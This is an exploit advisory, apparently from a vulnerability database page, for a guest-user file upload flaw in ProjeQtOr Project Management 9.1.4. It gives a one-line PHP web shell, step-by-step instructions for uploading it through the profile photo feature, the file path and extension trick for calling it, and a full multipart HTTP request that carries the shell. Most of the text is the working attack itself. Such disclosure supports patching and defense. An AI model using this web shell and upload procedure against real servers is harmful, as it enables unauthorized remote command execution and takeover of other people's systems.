ProjeQtOr Project Management 9.1.4 Shell Upload

Credit: Temel Demir
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution # Date: 29.05.2021 # Exploit Author: Temel Demir # Vendor Homepage: # Software Link: # Version: v9.1.4 # Tested on: Laragon @WIN10 # Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. PoC Process Step_by_Step: # 1) Create a file with the below php code and save it as demir.pHp <?php echo shell_exec($_GET['key'].' 2>&1'); ?> # 2) Login to ProjeQtOr portal as guest user # 3) Click -profile- button on header panel. # 4) Click -add photo- button and chose upload section and browse your demir.pHp file. # 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" ) # 6) As a last step you have to add the ".projeqtor" statement to the file extension. You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor # 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command] Example Request: POST /project/tool/saveAttachment.php HTTP/1.1 Host: ip:port Content-Length: 1196 Accept: application/json X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ Origin: http://ip:port/website_location/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://ip:port/website_location/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit) Connection: close ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp" Content-Type: application/octet-stream <?php echo shell_exec($_GET['key'].' 2>&1'); ?> ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentRefId" ($your_profile_id //edit) ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top